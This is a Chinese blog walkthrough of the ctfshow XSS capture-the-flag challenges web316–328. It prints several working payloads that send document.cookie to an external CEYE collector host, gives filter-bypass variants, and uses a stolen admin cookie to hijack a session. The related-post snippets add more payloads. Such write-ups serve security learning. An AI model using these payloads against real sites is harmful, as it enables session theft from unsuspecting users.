ctfshow XSS漏洞web316-328

已于 2022-04-17 13:00:51 修改
阅读量2.2k 收藏 16
点赞数 5
文章标签: web安全
于 2022-04-07 23:16:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62584974/article/details/124029430
版权

XSS漏洞

漏洞简介:
XSS(Cross Site Scripting)意为跨站脚本攻击。为了不与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。XSS漏洞是-种在Web应用中常见的安全漏洞,它允许用户将恶意代码植人Web页面,当其他用户访问此页面时,植人的恶意代码就会在其他用户的客户端中执行。
XSS漏洞的危害很多,可以通过XSS漏洞获取客户端用户的信息(例如用户登录的Cookie信息),可以通过XSS蠕虫进行信息传播,可以在客户端中植人木马,可以结合其他漏洞攻击服务器,在服务器中植人木马等。

XSS漏洞分类
XSS漏洞分为反射型XSS漏洞、存储型XSS漏洞和DOM型XSS漏洞3类

2022/4/7

反射性XSS

Web316

圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋!

CEYE - Monitor service for security testing

先在这个网站注册一个账号获得一个临时的域名

红框内的是临时的域名

然后在方框中输入:

<script>
var img=document.createElement("img"); img.src="http://你的ceye地址/"+document.cookie;
</script>

var img11=document.createElement("img");是生成一个img对象,然后 img11.src="http://你的ceye地址/"+document.cookie;,是加载加载一张图片加上当前的cookie这里我们填写的是接收平台的地址,所以会带上document.cookie去加载地址然后平台会有记录cookie的值ctf平台会有个虚拟机器人,充当admin的身份,每个一段时间点开网站它一点开就会加载payload,发送它自身的cookie在那个框内输入那个标签输进去,网站一加载就执行了我们输入的xss代码然后他自己发送cookie

 

就会有flag

还有别的方法:

1.window.open:

<script>window.open('http://你的ceye地址/'+document.cookie)</script>

2.input

<input onfocus="window.open('http://你的ceye地址/'+document.cookie)" autofocus>

3.svg

<svg onload="window.open('http://你的ceye地址/'+document.cookie)">

3.iframe

<iframe onload="window.open('http://你的ceye地址/'+document.cookie)"></iframe>

4.body(后面用的都是这个!!)

<body onload="window.open('http://你的ceye地址/'+document.cookie)">

2022/4/10

Web317

反射性XSS 带过滤

先试一下web316的答案可不可行

结果没有反应。可能是过滤了<script>

我们用<body>试下

<body onload="window.open('http://你的ceye地址/'+document.cookie)">

注意要把网址改为你的ceye地址不要直接粘贴

 成功了!

然后上自己的ceye网站查看flag

flag:

ctfshow{7ab994e4-19dd-410f-a619-9585a4f97843}

Web318

也是这个方法

然后我们再网站上查看flag

ctfshow{51d0b185-edf1-4c52-80d6-e1e39a2931ff}

web319

同上方法

得到flag

ctfshow{95389d61-a4cd-4cfa-aba2-6187ee220783}

web320

试用了一下前面的<body>方法发现没有反应,然后发现这道题过滤了空格

一般空格被过滤有如下替换方法

1./**/

2./

这道题目我们用/**/试试

<body/**/onload="window.open('http://h9izlh.ceye.io/'+document.cookie)">

ctfshow{6d3fa3bf-2ee9-40bc-86b6-916dde5193d8}

web321

同上(同320)

ctfshow{6355bec1-2b90-49c5-a2ef-0fd18e71c0f5}

后面的方法也都同上

存储型XSS

 web327

发件人填:admin

然后新的内容继续用我们的的body标签

<body onload="window.open('http://你的ceye地址/'+document.cookie)">

回到我们的ceye网站

 得到flag

ctfshow{96721deb-033e-4d73-91b9-11370ada01d2}

Web328

随便注册一个用户名

密码为:

<script>window.open('http://你的ceye地址/'+document.cookie)</script>

用script标签(body好像不太行)

然后我们就可以得到管理员的Cookie

管理员Cookie为

88f8e03853ojfg3qrlfl1a4h3p

 然后我们点击用户管理我们是什么都看不到的

然后按F12把这个页面的Cookie改成管理员的

然后就有了flag 

墨言ink
关注
CTFshow XSS(web316-333)
Kradress的博客
03-18 917
这里我们发现管理员才能查看用户名和密码,如果我们在注册的时候写入xss的payload,就会在用户管理界面执行我们的xss代码。这题没有过滤什么,但是如果用img的话,拿不到flag,但是referer是bot,我猜测bot触发不了img的。试试用admin的cookie修改密码,但是没有用,可能cookie失效了。这题拿cookie也看不到flag了,不过多了一个修改密码选项。随便注册一个用户test,余额只有6块,买flag要9999元。发现输出为空,说明被题目限制了,但是。可以用frame注入。
【CTF-WebXSS漏洞学习笔记(附ctfshow web316-333题目)
brhhh_sehe的博客
12-19 1050
用户在输入框中输入图片地址存储到str变量中 然后在xss()函数里面给id为demo的标签设置内容(innerHTML) 内容是加载图片,所以我们输入时放一个无法加载的图片,然后触发onerror事件,在这个事件里面可以触发弹窗,注意构造payload的时候一定要把img标签进行闭合。自己语言的转义:我认为就是在该网站中,比如说存在留言功能,然后攻击者留言了一段恶意代码,这段留言是别的用户也可以访问到的,在其他用户查看这段留言的时候服务器进行解析,导致执行一些危险行为,这个整段过程就是跨站脚本攻击。
CTFshow web入门 web316-web333 XSS
qq_56815564的博客
07-05 2540
我tm又来了,总之top10先过一遍,到第三个XSS了,下一个要去看了,看了网上很多wp总感觉不是太全,所以就自己写了一个网站没有对用户提交的数据进行转义处理或者过滤不足,从而被恶意攻击者利用进而被添加一些恶意可执行脚本嵌入到web页面中去,使别的用户访问都会执行相应的嵌入代码。
ctfshow-xxs-316-333-wp
最新发布
2301_80915592的博客
03-15 837
316.反射型 XSS-326都是反射型)js恶意代码是存在于某个参数中,通过url后缀进行get传入,当其他用户点进这个被精心构造的url链接时,恶意代码就会被解析,从而盗取用户信息。来看题,先简单测试一下是xxs直接注入(代码意思是浏览器解析这段代码时,会弹出一个警告对话框,显示当前网页的所有 Cookie 信息)弹出flag=你不是管理员。显然,由于我们不是管理员,所以cookie参数是不正确的。
CTFShow Xss
paidx0
08-12 1563
CTFShow Xss(学习) 简单介绍一下Xss 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞关键就是寻找参数未过滤的输出函数。 常见的输出函数有: echo printf print print_r sprintf die var-dump var_export xss 分类:(三类) 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺
ctfshow XSS
quan9i的博客
06-28 1623
ctfshow XSS 316-333
ctfshow XSS web316-web333 wp
mumuzi的博客
02-05 5840
可能写的有点啰嗦,记录自己做题的过程 文章目录web316web317web318web319web320web321web322web323web324web325web326web327web328web329web330web331web332web333 web316 后台会每隔一段时间(一般为15秒)去访问一次我们的链接(毕竟要领10个鸡蛋bot要康康你的分享状态),当BOT访问我们的xss的时候我们就能拿到admin的cookie。 这里有两种方法来获取,一种是在线的xss平台,如https:/
ctfshow-xss(web316-web330)
m0_72125469的博客
07-03 1545
web317讲解相当细致精致练习XSSweb316这道题估计陆陆续续弄了半天 因为xss可以说基本不会 还好最终彻彻底底明白了首先这道题是反射性xss 也就是必须点击某一个xss链接 才能达到xss效果这道题的意思就是 写一个祝福语生成链接发送给朋友 这个祝福语的位置就是我们实现XSS的位置已知:flag在BOT(程序,机器人)的cookie中并且 生成的链接后端BOT会每隔一段时间访问所以 要构造一个含有XSS的链接 使得管理员只要访问就能获取BOT的cookie。
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow xss328
01-29
对于编号为 xss328 的跨站脚本攻击(XSS)挑战,在解决此类问题时通常需要考虑如何利用反射型或存储型 XSS 漏洞来执行恶意脚本。虽然特定题目细节未提供,但一般而言,这类挑战往往涉及以下几个方面: #### 反射型 ...
ctfshow_web316-326_反射型XSS
记录学习成长之路上的点点滴滴
05-08 1258
2023/05/07 ctfshow刷题 web316-326 反射型XSS
ctfshow XSS web316~web333
shinygod的博客
11-25 2164
ctfshow XSS web316~web333
[WP/CTFshow]XSS Web316-333
車鈊的博客
07-11 1888
CTFSHOW WP 题目的原理就是靶机的bot每隔一段时间访问输入的内容,模拟了反射型XSS 316.需要配套接收端XSS脚本 如果未过滤script且对外部资源加载无限制的情况下,可以指定src为精心准备的JS文件,使其加载,产生携带COOKIE的请求。 本解法直接将产生请求写在了表层。 <script>document.location.href='http://xxxxxxxxxxxxxxxxxxxx/x.php?1='+document.cookie</script> 3
CTFshow刷题日记-WEB-XSS(web316-333)
Love&Share
09-29 5709
web316-无过滤反射型XSS 大概就是要生成Xss代码链接,获取管理员cookie,后台bot每隔一段时间自动点击链接 方法一:xss平台 利用xss平台生成链接 xss平台 https://xsshs.cn/,https://xss.pt/,http://xsscom.com 在xss平台创建项目,选择默认模块即可,复制生成的xss代码,复制到题目留言框中 刷新下页面,然后在平台查看项目 方法二:自动接收脚本 在自己的服务器上放一个PHP代码 # a.php <?php $cookie
ctfshow web入门 xss(持续更新)
Lum1n0us's Blog
08-07 654
文章目录前言web316web317web318-319web320-325 前言 因为各种各样的问题,我这里就只让他弹窗,而不把获取flag作为目标了 web316 第一关,很简单,没有过滤,直接 <script>alert(0)</script> 就能弹窗 web317 有过滤了,可能是把script过滤了,可以用img标签 <img src=1 onerror=alert(0)> web318-319 img标签也被过滤了,可以用body标签,它被ban的概率比
ctfshowXSS
njh18790816639的博客
05-19 395
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 大致的介绍一下XSS漏洞!此时我们可以使用这个xss平台***https://xss.pt/xss.php*** 注.
CTFSHOW-XSS
Yb_140的博客
05-13 283
我们先注册一个账号,如果为admin提示不可注册,我们注册一个admin1。payload还是上面的,写在信的内容处,同时注意收件人是admin。先在自己的服务器上开启一个web服务,用来接收flag。前面都是反射型,这题开始是存储型。目的:拿到管理员的cookie。上面的payload不能用了。payload同上.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值